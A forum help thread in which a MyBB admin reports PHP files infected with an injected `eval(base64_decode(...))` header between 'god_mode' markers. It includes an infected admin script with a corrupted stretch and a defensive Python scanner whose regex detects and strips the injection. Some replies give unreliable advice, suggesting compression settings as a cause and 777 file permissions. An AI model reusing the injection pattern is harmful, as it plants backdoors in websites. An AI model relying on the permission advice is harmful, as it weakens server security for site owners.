XEDE   15 Mar, 2012, 9:41 am
#1
Hello, good afternoon. I have a question: today I went into my site again and found an enormous piece of error code in the header. This happened a while ago, but it was a different code. The strange thing is that it modifies the files in MyBB's adm folder and others as well, as long as they are .php. In my case I renamed MyBB's adm folder last time, but it seems that doing that does not help. The code is different this time, and it modified the header of more files. For example, this is the index.php located at /foro/adm/index.php (the same code is in several PHP files):

<?php /*god_mode_on*/eval(base64_decode("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")); /*god_mode_off*/ ?><?php ?><?php ?><?php ?><?php
/**
 * MyBB 1.6
 * Copyright 2010 MyBB Group, All Rights Reserved
 *
 * Website: http://mybb.com
 * License: http://mybb.com/about/license
 *
 * $Id: index.php 5441 2011-04-16 09:07:17Z jammerx2 $
 */

define("IN_MYBB", 1);
define("IN_ADMINCP", 1);

// Here you can change how much of an Admin CP IP address must match in a previous session for the user is validated (defaults to 3 which matches a.b.c)
define("ADMIN_IP_SEGMENTS", 3);

require_once dirname(dirname(__FILE__))."/inc/init.php";

send_page_headers();

if(!isset($config['admin_dir']) || !file_exists(MYBB_ROOT.$config['admin_dir']."/inc/class_page.php"))
{
	$config['admin_dir'] = "admin";
}

define('MYBB_ADMIN_DIR', MYBB_ROOT.$config['admin_dir'].'/');

define('COPY_YEAR', my_date('Y', TIME_NOW));

require_once MYBB_ADMIN_DIR."inc/class_page.php";
require_once MYBB_ADMIN_DIR."inc/class_form.php";
require_once MYBB_ADMIN_DIR."inc/class_table.php";
require_once MYBB_ADMIN_DIR."inc/functions.php";
require_once MYBB_ROOT."inc/functions_user.php";

if(!file_exists(MYBB_ROOT."inc/languages/".$mybb->settings['cplanguage']."/admin/home_dashboard.lang.php"))
{
	$mybb->settings['cplanguage'] = "english";
}
$lang->set_language($mybb->settings['cplanguage'], "admin");

// Load global language phrases
$lang->load("global");

if(function_exists('mb_internal_encoding') && !empty($lang->settings['charset']))
{
	@mb_internal_encoding($lang->settings['charset']);
}

header("Content-type: text/html; charset={$lang->settings['charset']}");

$time = TIME_NOW;
$errors = null;

if(is_dir(MYBB_ROOT."install") && !file_exists(MYBB_ROOT."install/lock"))
{
	$mybb->trigger_generic_error("install_directory");
}

$ip_address = get_ip();
unset($user);

// Load Admin CP style
if(!$cp_style)
{
	if(!empty($mybb->settings['cpstyle']) && file_exists(MYBB_ADMIN_DIR."/styles/".$mybb->settings['cpstyle']."/main.css"))
	{
		$cp_style = $mybb->settings['cpstyle'];
	}
	else
	{
		$cp_style = "default";
	}
}

$default_page = new DefaultPage;

$logged_out = false;
$fail_check = 0;
$post_verify = true;

if($mybb->input['action'] == "logout")
{
	// Delete session from the database
	$db->delete_query("adminsessions", "sid='".$db->escape_string($mybb->cookies['adminsid'])."'");
	my_setcookie("adminsid", "");
	$logged_out = true;
}
elseif($mybb->input['action'] == "unlock")
{
	$user = array();
	if($mybb->input['username'])
	{
		$query = $db->simple_select("users", "*", "LOWER(username)='".$db->escape_string(my_strtolower($mybb->input['username']))."'");
		$user = $db->fetch_array($query);
		if(!$user['uid'])
		{
			$error[] = $lang->error_invalid_username;
		}
	}
	else if($mybb->input['uid'])
	{
		$query = $db->simple_select("users", "*", "uid='".intval($mybb->input['uid'])."'");
		$user = $db->fetch_array($query);
		if(!$user['uid'])
		{
			$error[] = $lang->error_invalid_uid;
		}
	}
	
	// Do we have the token? If so let's process it
	if($mybb->input['token'] && $user['uid'])
	{		
		$query = $db->simple_select("awaitingactivation", "COUNT(aid) AS num", "uid='".intval($user['uid'])."' AND code='".$db->escape_string($mybb->input['token'])."' AND type='l'");
		
		// If we're good to go
		if($db->fetch_field($query, "num") > 0)
		{
			$db->delete_query("awaitingactivation", "uid='".intval($user['uid'])."' AND code='".$db->escape_string($mybb->input['token'])."' AND type='l'");
			$db->update_query("adminoptions", array('loginlockoutexpiry' => 0, 'loginattempts' => 0), "uid='".intval($user['uid'])."'");
			
			admin_redirect("index.php");
		}
		else
		{
			$error[] = $lang->error_invalid_token;
		}
	}
	
	$default_page->show_lockout_unlock();
}
elseif($mybb->input['do'] == "login")
{	
	$user = validate_password_from_username($mybb->input['username'], $mybb->input['password']);
	if($user['uid'])
	{
		$query = $db->simple_select("users", "*", "uid='".$user['uid']."'");
		$mybb->user = $db->fetch_array($query);
	}

	if($mybb->user['uid'])
	{
		if(login_attempt_check_acp($mybb->user['uid']) == true)
		{
			$default_page->show_lockedout();
		}

		$db->delete_query("adminsessions", "uid='{$mybb->user['uid']}'");
		
		$sid = md5(uniqid(microtime(true)));
		
		// Create a new admin session for this user
		$admin_session = array(
			"sid" => $sid,
			"uid" => $mybb->user['uid'],
			"loginkey" => $mybb->user['loginkey'],
			"ip" => $db->escape_string(get_ip()),
			"dateline" => TIME_NOW,
			"lastactive" => TIME_NOW,
			"data" => "",
		);
		$db->insert_query("adminsessions", $admin_session);
		$db->update_query("adminoptions", array("loginattempts" => 0, "loginlockoutexpiry" => 0), "uid='".intval($mybb->user['uid'])."'", 1);
		my_setcookie("adminsid", $sid);
		my_setcookie('acploginattempts', 0);
		$post_verify = false;
	
		$mybb->request_method = "get";
		
		if($mybb->input['module'])
		{
			admin_redirect("index.php?module=".$mybb->input['module']);
		}
	}
	else
	{
		$query = $db->simple_select("users", "uid,email", "LOWER(username) = '".$db->escape_string(my_strtolower($mybb->input['username']))."'");
		$login_user = $db->fetch_array($query);
		
		if($login_user['uid'] > 0)
		{
			$db->update_query("adminoptions", array("loginattempts" => "loginattempts+1"), "uid='".intval($login_user['uid'])."'", 1, true);
		}
		
		$loginattempts = login_attempt_check_acp($login_user['uid'], true);
		
		// Have we attempted too many times?
		if($loginattempts['loginattempts'] > 0)
		{
			// Have we set an expiry yet?
			if($loginattempts['loginlockoutexpiry'] == 0)
			{
				$db->update_query("adminoptions", array("loginlockoutexpiry" => TIME_NOW+(intval($mybb->settings['loginattemptstimeout'])*60)), "uid='".intval($login_user['uid'])."'", 1);
			}
			
			// Did we hit lockout for the first time? Send the unlock email to the administrator 
			if($loginattempts['loginattempts'] == $mybb->settings['maxloginattempts'])
			{				
				$db->delete_query("awaitingactivation", "uid='".intval($login_user['uid'])."' AND type='l'");
				$lockout_array = array(
					"uid" => $login_user['uid'],
					"dateline" => TIME_NOW,
					"code" => random_str(),
					"type" => "l"
				);
				$db->insert_query("awaitingactivation", $lockout_array);
				
				$subject = $lang->sprintf($lang->locked_out_subject, $mybb->settings['bbname']);
				$message = $lang->sprintf($lang->locked_out_message, htmlspecialchars_uni($mybb->input['username']), $mybb->settings['bbname'], $mybb->settings['maxloginattempts'], $mybb->settings['bburl'], $mybb->config['admin_dir'], $lockout_array['code']);
				my_mail($login_user['email'], $subject, $message);
			}
			
			$default_page->show_lockedout();
		}
		
		$fail_check = 1;
	}
}
else
{
	// No admin session - show message on the login screen
	if(!isset($mybb->cookies['adminsid']))
	{
		$login_message = "";
	}
	// Otherwise, check admin session
	else
	{
		$query = $db->simple_select("adminsessions", "*", "sid='".$db->escape_string($mybb->cookies['adminsid'])."'");
		$admin_session = $db->fetch_array($query);

		// No matching admin session found - show message on login screen
		if(!$admin_session['sid'])
		{
			$login_message = $lang->invalid_admin_session;
		}
		else
		{
			$admin_session['data'] = @unserialize($admin_session['data']);

			// Fetch the user from the admin session
			$query = $db->simple_select("users", "*", "uid='{$admin_session['uid']}'");
			$mybb->user = $db->fetch_array($query);

			// Login key has changed - force logout
			if(!$mybb->user['uid'] || $mybb->user['loginkey'] != $admin_session['loginkey'])
			{
				unset($mybb->user);
			}
			else
			{
				// Admin CP sessions 2 hours old are expired
				if($admin_session['lastactive'] < TIME_NOW-7200)
				{
					$login_message =nattempts'], $mybb->settings['bburl'], $mybb->config['admin_dir'], $lockout_array['code']);
				my_mail($login_user['email'], $subject, $message);
			}
			
			$default_page->show_lockedout();
		}
		
		$fail_check = 1;
	}
}
else
{
	// No admin session - show message on the login screen
	if(!isset($mybb->cookies['adminsid']))
	{
		$login_message = "";
	}
	// Otherwise, check admin session
	else
	{
		$query = $db->simple_select("adminsessions", "*", "sid='".$db->escape_string($mybb->cookies['adminsid'])."'");
		$admin_session = $db->fetch_array($query);

		// No matching admin session found - show message on login screen
		if(!$admin_session['sid'])
		{
			$login_message = $lang->invalid_admin_session;
		}
		else
		{
			$admin_session['data'] = @unserialize($admin_session['data']);

			// Fetch the user from the admin session
			$query = $db->simple_select("users", "*", "uid='{$admin_session['uid']}'");
			$mybb->user = $db->fetch_array($query);

			// Login key has changed - force logout
			if(!$mybb->user['uid'] || $mybb->user['loginkey'] != $admin_session['loginkey'])
			{
				unset($mybb->user);
			}
			else
			{
				// Admin CP sessions 2 hours old are expired
				if($admin_session['lastactive'] < TIME_NOW-7200)
				{
					$login_message = $lang->error_admin_session_expired;
					$db->delete_query("adminsessions", "sid='".$db->escape_string($mybb->cookies['adminsid'])."'");
					unset($mybb->user);
				}
				// If IP matching is set - check IP address against the session IP
				else if(ADMIN_IP_SEGMENTS > 0)
				{
					$exploded_ip = explode(".", $ip_address);
					$exploded_admin_ip = explode(".", $admin_session['ip']);
					$matches = 0;
					$valid_ip = false;
					for($i = 0; $i < ADMIN_IP_SEGMENTS; ++$i)
					{
						if($exploded_ip[$i] == $exploded_admin_ip[$i])
						{
							++$matches;
						}
						if($matches == ADMIN_IP_SEGMENTS)
						{
							$valid_ip = true;
							break;
						}
					}
					
					// IP doesn't match properly - show message on logon screen
					if(!$valid_ip)
					{
						$login_message = $lang->error_invalid_ip;
						unset($mybb->user);
					}
				}
			}
		}
	}
}

if(!$mybb->user['usergroup'])
{
	$mybbgroups = 1;
}
else
{
	$mybbgroups = $mybb->user['usergroup'].",".$mybb->user['additionalgroups'];
}
$mybb->usergroup = usergroup_permissions($mybbgroups);

if($mybb->usergroup['cancp'] != 1 || !$mybb->user['uid'])
{
	$db->delete_query("adminsessions", "uid='".intval($mybb->user['uid'])."'");
	unset($mybb->user);
	my_setcookie("adminsid", "");
}

if($mybb->user['uid'])
{
	$query = $db->simple_select("adminoptions", "*", "uid='".$mybb->user['uid']."'");
	$admin_options = $db->fetch_array($query);
	
	if(!empty($admin_options['cpstyle']) && file_exists(MYBB_ADMIN_DIR."/styles/{$admin_options['cpstyle']}/main.css"))
	{
		$page->style = $cp_style = $admin_options['cpstyle'];
	}

	// Update the session information in the DB
	if($admin_session['sid'])
	{
		$db->update_query("adminsessions", array('lastactive' => TIME_NOW, 'ip' => $db->escape_string(get_ip())), "sid='".$db->escape_string($admin_session['sid'])."'");
	}

	// Fetch administrator permissions
	$mybb->admin['permissions'] = get_admin_permissions($mybb->user['uid']);
}

// Include the layout generation class overrides for this style
if(file_exists(MYBB_ADMIN_DIR."/styles/{$cp_style}/style.php"))
{
	require_once MYBB_ADMIN_DIR."/styles/{$cp_style}/style.php";
}

// Check if any of the layout generation classes we can override exist in the style file
$classes = array(
	"Page" => "DefaultPage",
	"SidebarItem" => "DefaultSidebarItem",
	"PopupMenu" => "DefaultPopupMenu",
	"Table" => "DefaultTable",
	"Form" => "DefaultForm",
	"FormContainer" => "DefaultFormContainer"
);
foreach($classes as $style_name => $default_name)
{
	// Style does not have this layout generation class, create it
	if(!class_exists($style_name))
	{
		eval("class {$style_name} extends {$default_name} { }");
	}
}

$page = new Page;
$page->style = $cp_style;

// Do not have a valid Admin user, throw back to login page.
if(!$mybb->user['uid'] || $logged_out == true)
{	
	if($logged_out == true)
	{
		$page->show_login($lang->success_logged_out);
	}
	elseif($fail_check == 1)
	{
		$page->show_login($lang->error_invalid_username_password, "error");
	}
	else
	{
		// If we have this error while retreiving it from an AJAX request, then send back a nice error
		if($mybb->input['ajax'] == 1)
		{
			echo "<error>login</error>";
			die;
		}
		$page->show_login($login_message, "error");
	}
}

$page->add_breadcrumb_item($lang->home, "index.php");

// Begin dealing with the modules
$modules_dir = MYBB_ADMIN_DIR."modules";
$dir = opendir($modules_dir);
while(($module = readdir($dir)) !== false)
{
	if(is_dir($modules_dir."/".$module) && !in_array($module, array(".", "..")) && file_exists($modules_dir."/".$module."/module_meta.php"))
	{
		require_once $modules_dir."/".$module."/module_meta.php";
		
		// Need to always load it for admin permissions / quick access
		$lang->load($module."_module_meta", false, true);
		
		$has_permission = false;
		if(function_exists($module."_admin_permissions"))
		{
			if(isset($mybb->admin['permissions'][$module]))
			{
				$has_permission = true;
			}
		}
		// This module doesn't support permissions
		else
		{
			$has_permission = true;
		}
			
		// Do we have permissions to run this module (Note: home is accessible by all)
		if($module == "home" || $has_permission == true)
		{
			$meta_function = $module."_meta";
			$initialized = $meta_function();
			if($initialized == true)
			{
				$modules[$module] = 1;
			}
		}
		else
		{
			$modules[$module] = 0;
		}
	}
}

$plugins->run_hooks_by_ref("admin_tabs", $modules);

closedir($dir);

if(strpos($mybb->input['module'], "/") !== false)
{
	$current_module = explode("/", $mybb->input['module'], 2);
}
else
{
	$current_module = explode("-", $mybb->input['module'], 2);
}

if($mybb->input['module'] && isset($modules[$current_module[0]]))
{
	$run_module = $current_module[0];
}
else
{
	$run_module = "home";
}

$action_handler = $run_module."_action_handler";
$action_file = $action_handler($current_module[1]);

if($run_module != "home")
{
	check_admin_permissions(array('module' => $page->active_module, 'action' => $page->active_action));
}

// Set our POST validation code here
$mybb->post_code = generate_post_check();

// Only POST actions with a valid post code can modify information. Here we check if the incoming request is a POST and if that key is valid.
$post_check_ignores = array(
	"example/page" => array("action")
); // An array of modules/actions to ignore POST checks for.

if($mybb->request_method == "post")
{
	if(in_array($mybb->input['module'], $post_check_ignores))
	{
		$k = array_search($mybb->input['module'], $post_check_ignores);
		if(in_array($mybb->input['action'], $post_check_ignores[$k]))
		{
			$post_verify = false;
		}
	}
	
	if($post_verify == true)
	{
		// If the post key does not match we switch the action to GET and set a message to show the user
		if(!isset($mybb->input['my_post_key']) || $mybb->post_code != $mybb->input['my_post_key'])
		{
			$mybb->request_method = "get";
			$page->show_post_verify_error = true;
		}
	}
}

$lang->load("{$run_module}_{$page->active_action}", false, true);

$plugins->run_hooks("admin_load");

require $modules_dir."/".$run_module."/".$action_file;
?>

As you can see, at the beginning of the file there is an enormous amount of code that obviously should not be there. Is this a hacking attempt, or a MyBB bug?


EDIT:
As an additional detail: last time I deleted that code from all the templates and it was fixed, but now, in the case of this template, it tells me that I still have an error on line 256, which in Notepad++ would be this one:

					$login_message =nattempts'], $mybb->settings['bburl'], $mybb->config['admin_dir'], $lockout_array['code']);
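
A defender-side check for the header shown in the first post, as an added example (not part of the thread and not MyBB code): it recognises the `/*god_mode_on*/ ... /*god_mode_off*/` block, strips it in memory, and compares the remainder with a hash taken from a fresh copy of the same release, which separates files that only carry the header from files whose body was also damaged, like the line quoted in the EDIT. The `known_good` manifest, the function names and the sample files are assumptions constructed for the example.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Pattern for the header shown in the post: "<?php", optional whitespace, the
# /*god_mode_on*/ ... /*god_mode_off*/ markers, "?>", then empty "<?php ?>" tags.
INJECTED = re.compile(
    rb"<\?php\s*/\*god_mode_on\*/.*?/\*god_mode_off\*/\s*\?>(?:\s*<\?php\s*\?>)*",
    re.DOTALL,
)

def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

def strip_injection(data: bytes):
    """Return (data without injected headers, number of headers removed)."""
    return INJECTED.subn(b"", data)

def audit_tree(root, known_good):
    """Classify every .php file under root.

    known_good maps a relative path to the SHA-256 of that file in a fresh
    copy of the same release (hypothetical manifest built by the admin).
    """
    report = {}
    for path in sorted(Path(root).rglob("*.php")):
        rel = path.relative_to(root).as_posix()
        data = path.read_bytes()
        cleaned, hits = strip_injection(data)
        intact = sha256(cleaned) == known_good.get(rel)
        if hits and intact:
            report[rel] = "injected, body intact"
        elif hits:
            report[rel] = "injected, body damaged"   # restore from clean copy
        elif intact:
            report[rel] = "clean"
        else:
            report[rel] = "modified or unknown"
    return report

def demo():
    # Constructed sample files; the base64 string is a harmless placeholder.
    original = b"<?php\n/**\n * MyBB 1.6\n */\ndefine(\"IN_MYBB\", 1);\n?>\n"
    header = (b"<?php" + b" " * 400 + b'/*god_mode_on*/eval(base64_decode("AAAA"));'
              b" /*god_mode_off*/ ?><?php" + b" " * 200 + b"\n   ?><?php   ?>")
    truncated = original.replace(b'define("IN_MYBB", 1);', b"define(")
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "adm").mkdir()
        (root / "index.php").write_bytes(original)
        (root / "adm" / "index.php").write_bytes(header + original)
        (root / "adm" / "login.php").write_bytes(header + truncated)
        (root / "plugin.php").write_bytes(b"<?php echo 1; ?>")
        manifest = {p: sha256(original) for p in
                    ("index.php", "adm/index.php", "adm/login.php")}
        return audit_tree(root, manifest)

if __name__ == "__main__":
    for name, status in demo().items():
        print(f"{status:24} {name}")
```

Nothing is written back to disk: a file reported as damaged, or one with no entry in the manifest, is a candidate for replacement from a clean copy rather than for in-place editing.
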
papi   15 Mar, 2012, 9:53 am
#2
Well, it is possible that it is an attempt to hack your site. Check the file and folder permissions and change the password for your forum as well as for cPanel and for MSN or e-mail.
XEDE   15 Mar, 2012, 10:10 am
#3
Thanks for the reply, papi. The permissions on all the modified files are 444. I am now restoring files and plugins; in other words, almost all the .php files are modified, and on top of that I have a backup but it is old T-T
Cluster   15 Mar, 2012, 10:25 am
#4
What compression level do you have?

Smile
papi   15 Mar, 2012, 10:33 am
#5
(15 Mar, 2012, 10:25 am)Cluster wrote: What compression level do you have?

Hmm, that's true. I missed that detail. Try setting the compression level to a value lower than 5 (or even disable that option, since there are servers that do not allow it).
XEDE   15 Mar, 2012, 10:55 am
#6
By compression, do you mean gzip? If so, I always have it disabled. This is what the footer shows me:

Generated in 0.5084991 seconds (43.59% PHP / 56.41% MySQL)
SQL Queries: 487 / Global Parsing Time: 0.1376991 / Memory Usage: 17.5 MB
PHP version: 5.2.17 / Server Load: 5.78 / GZip Compression: Disabled
Cluster   15 Mar, 2012, 11:00 am
#7
Try enabling it at level 4

Smile
XEDE   15 Mar, 2012, 11:09 am
#8
I tried to enable it, but when I clicked save in the settings tab it showed me this:
[Image: 8681.png]
As you can see in the image, it is as if it flagged an error but the message did not appear, and when I go back in to look, the option is still disabled. For now I am still clicking on every option on the site, looking for more modified files, although I am leaving now because I have to go to work xD I will keep looking for problems later -_-
Also, as a question: is it plausible that this really is a hacking attempt, and not a MyBB fault?
I have had MyBB since October of last year, and this is the second time this has happened, but with different code.
Cluster   15 Mar, 2012, 11:14 am
#9
We would like to think so, since this kind of error has not been seen before. Still, do not rule out that it is the server, since many servers (their automated systems) modify your files.

Smile
papi   15 Mar, 2012, 11:15 am
#10
Well, I suspect not. If you have the permissions at 444 or 644, it makes sense that it does not let you overwrite anything. Right now I do not remember what the permissions are for each folder, but set them to write permissions (777) and, once the files are modified, put them back to 644.